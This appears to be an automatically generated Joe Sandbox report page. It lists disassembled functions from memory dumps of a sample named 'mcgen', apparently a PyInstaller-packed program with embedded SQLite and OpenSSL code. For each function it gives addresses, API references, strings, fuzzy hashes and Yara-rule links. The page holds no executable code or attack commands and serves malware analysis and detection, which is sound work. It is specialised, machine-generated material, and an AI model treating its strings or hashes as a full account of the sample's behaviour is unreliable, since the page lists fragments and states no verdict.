Associated: 00000002.00000002.2535253168.00007FFD94761000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD947A8000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD947B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD947F1000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94825000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD9484F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD94864000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2535253168.00007FFD9489E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2536310062.00007FFD948A7000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94250000_mcgen.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 662937bf5eab52d13515c477ba44b596dd64b1bd4478d146c43571e1c103da3e
Instruction ID: e320125ad75069a756ccf5a5ba2958a8cbfc318b3bff68fa64318bed46536124
Opcode Fuzzy Hash: 662937bf5eab52d13515c477ba44b596dd64b1bd4478d146c43571e1c103da3e
Instruction Fuzzy Hash: DB6288A272919286E7258F38D49037D7790FB49385F049131EAEED37C9EABCEA45C710

Function 00007FFD940F22E0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940F2498

Strings

:memory:, xrefs: 00007FFD940F2346

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: :memory:
API String ID: 4157932375-2920599690
Opcode ID: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
Instruction ID: 264fda48794dc7e9d1e8cc22cb54d1caee94d031fbbd749d33f5821129e59954
Opcode Fuzzy Hash: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
Instruction Fuzzy Hash: CF427F22B0978282EA75DBA594B037927A0FF86F44F548179CE4D07792DF3EE995D300

Function 00007FFD940E1240 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFD940E1265

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction ID: 9be823d5a0974f2a561a8aa63bfc2fc61c29cdeae727e8f1de1af2e15de27c8b
Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction Fuzzy Hash: 15A1E961B0AB4781EF78CBD5A8F427622A0BF46B84F54C535C95D4E7A2EF2DE5A0D300

Function 00007FF6B9F11950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B9F17F80: _fread_nolock.LIBCMT ref: 00007FF6B9F1802A

_fread_nolock.LIBCMT ref: 00007FF6B9F11A1B

Part of subcall function 00007FF6B9F12910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B9F11B6A), ref: 00007FF6B9F1295E

Strings

Failed to read cookie!, xrefs: 00007FF6B9F11A2B
malloc, xrefs: 00007FF6B9F11B22
fread, xrefs: 00007FF6B9F11A32, 00007FF6B9F11B5C
Could not read full TOC!, xrefs: 00007FF6B9F11B55
Failed to seek to cookie position!, xrefs: 00007FF6B9F119EE
MEI, xrefs: 00007FF6B9F11991
Could not allocate memory for archive structure!, xrefs: 00007FF6B9F11A61
Error on file., xrefs: 00007FF6B9F11B8D
fseek, xrefs: 00007FF6B9F119F5
calloc, xrefs: 00007FF6B9F11A68
Could not allocate buffer for TOC!, xrefs: 00007FF6B9F11B1B

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
Instruction ID: 447ad0c857d12893f861ae050949b50043e070b3e72dfc6b881d56536d27eec7
Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
Instruction Fuzzy Hash: E38181B1B1C6A285EB20DF28D0507F933A8AF457A6F448031EB8DC7785DE3CE5858781

Function 00007FF6B9F11470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6B9F114DE
malloc, xrefs: 00007FF6B9F1151F
fread, xrefs: 00007FF6B9F115E6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6B9F11518
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6B9F115DF
fseek, xrefs: 00007FF6B9F114E5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6B9F1149F

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 5d10e1bdc5eb677b37f82fe4c622a980a6ccb223d526a048addc0d2785746a1e
Instruction ID: 8be978f6cd17b13e4ce43d89b2732511896161ea4acae3bd1ea3e97f422f7712
Opcode Fuzzy Hash: 5d10e1bdc5eb677b37f82fe4c622a980a6ccb223d526a048addc0d2785746a1e
Instruction Fuzzy Hash: 9241A362B086A286EB10DF3994102B97398FF457A6F848532EF0D87B95DF3CE502C745

Function 00007FFD94154450 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD941545D9

Strings

CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FFD941544F4
sqlite_temp_master, xrefs: 00007FFD94154495
sqlite_master, xrefs: 00007FFD9415449C
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FFD941547CF
table, xrefs: 00007FFD9415447A
ase, xrefs: 00007FFD941546DD

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 4157932375-879093740
Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction ID: 28a1649b2d09e1a2cb3863f43ab4f2729998b73667846a661c6dd22398a7bb57
Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction Fuzzy Hash: 85E19E23F0CB9186EB34CBE595A03B927A5BB46B88F058235DE4D27796DF38E452C344

Function 00007FF6B9F11210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF6B9F112C1, 00007FF6B9F112F6
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6B9F112BA
1.3.1, xrefs: 00007FF6B9F11249
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6B9F1141E
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6B9F11276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6B9F112EF

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
Instruction ID: 330fa6b6658db6d64631149d41d55a437fdb89db0e66f1d1ee3f65118d593694
Opcode Fuzzy Hash: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
Instruction Fuzzy Hash: 8C51E662B0C6A281E6609F29A4103BA6299FF87BB6F548135EF4DC77C5EE3CE505C740

Function 00007FFD94108FF0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFDAC063010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFD9414D120), ref: 00007FFD9410918D

Strings

%s at line %d of [%.10s], xrefs: 00007FFD94109053
misuse, xrefs: 00007FFD94109047
API called with finalized prepared statement, xrefs: 00007FFD9410901C
API called with NULL prepared statement, xrefs: 00007FFD94109004
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFD9410903A

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 4157932375-3538577999
Opcode ID: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
Instruction ID: a4d5aeda9dd269145a2fab5d85c97fec08322e74ff0667b2dfbb3ee54fec1b92
Opcode Fuzzy Hash: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
Instruction Fuzzy Hash: 8651B323B1E65285FA349B9194B42796395AF47BA0F58C131DD5D273C7EE3DE446C300

Function 00007FF6B9F16350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6B9F163F7
Failed to load Python DLL '%ls'., xrefs: 00007FF6B9F16497
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6B9F16446
LoadLibrary, xrefs: 00007FF6B9F1649E
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6B9F163B7
ucrtbase.dll, xrefs: 00007FF6B9F163CD

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction ID: 97204bd2ee85d3d6ad1084c1e85c0ccb472648f685519b5a01a069e9fe06400d
Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction Fuzzy Hash: 6E41B6B1B0C6A791EA21DF68E4142E96319FF453A6F900132DB5C83295EF3CE505C780

Function 00007FFD940DFFE0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD940E021A

Strings

exclusive, xrefs: 00007FFD940E01AB
psow, xrefs: 00007FFD940E0591
winOpen, xrefs: 00007FFD940E048D
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFD940E02F6

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction ID: b2b4b845eb6ad07bec8a15894951dd7132fa572633acc7ba1d3db7e03b614147
Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction Fuzzy Hash: 3D028321B0964386FA748BA1A4F037B63A0FF86B98F14C235DD4D0A6A6DF3DE565D700

Function 00007FFD940DD9F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940DDA33
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940DDA5C
ReadFile.KERNEL32 ref: 00007FFD940DDAAF

Strings

winRead, xrefs: 00007FFD940DDB07
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFD940DDB48

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010$FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2531077403-1843600136
Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction ID: 0dd4f34eaa57d3081edc4793f0a7f32dfc9ec21332bcd222bdc9db624c7e8b94
Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction Fuzzy Hash: 5C413622B1C74681E2309F95E8E06A977A5FF96B84F50C132FA4C47696DF3DE54AC340

Function 00007FFDA33414F1 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 231COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDA3387D72

Strings

ssl3_read_n, xrefs: 00007FFDA3387C0A, 00007FFDA3387D12, 00007FFDA3387E31, 00007FFDA3387E9A
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFDA3387C16, 00007FFDA3387D1E, 00007FFDA3387E3D, 00007FFDA3387EA6

Memory Dump Source

Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true

Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
API String ID: 1452528299-4226281315
Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
Instruction ID: fb821f619991b0e42f19b336493aa1561c839daf379281cf6342a718bf78a84d
Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
Instruction Fuzzy Hash: 76A18B21B0EE8682FB50BF65D4607B92293AF44BC8F544135DE4D2BB9ADF3EE4458318

Function 00007FFDA33414BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDA339F1C3

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FFDA339F2B5, 00007FFDA339F45C, 00007FFDA339F48F
state_machine, xrefs: 00007FFDA339F2AE, 00007FFDA339F450, 00007FFDA339F483

Memory Dump Source

Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true

Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction ID: 82423116829aba53502022394cf1646a0439bc73bba7d0535c75afc75ab2a507
Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction Fuzzy Hash: 62A18025B0EE42C1FB60BE25D8713BD2296EF41B45F184032D94D6A7DBCE3EE8818359

Function 00007FFDA334127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDA3388AC5

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFDA3388B6E, 00007FFDA3388BCA
ssl3_write_pending, xrefs: 00007FFDA3388B62, 00007FFDA3388BBE

Memory Dump Source

Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true

Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
API String ID: 1452528299-1219543453
Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction ID: ebe0d70dfd62fa681f6d0a35b3134f483dd6179b65059c4d5378ea7ce9e33f44
Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction Fuzzy Hash: CA419D62B0EE8283F750AF59D4647B933A2FB80B84F244135DA1D1BB96DF7EE4518308

Function 00007FF6B9F1CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B9F1CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6B9F1CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6B9F1CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6B9F1CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6B9F1CD91

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
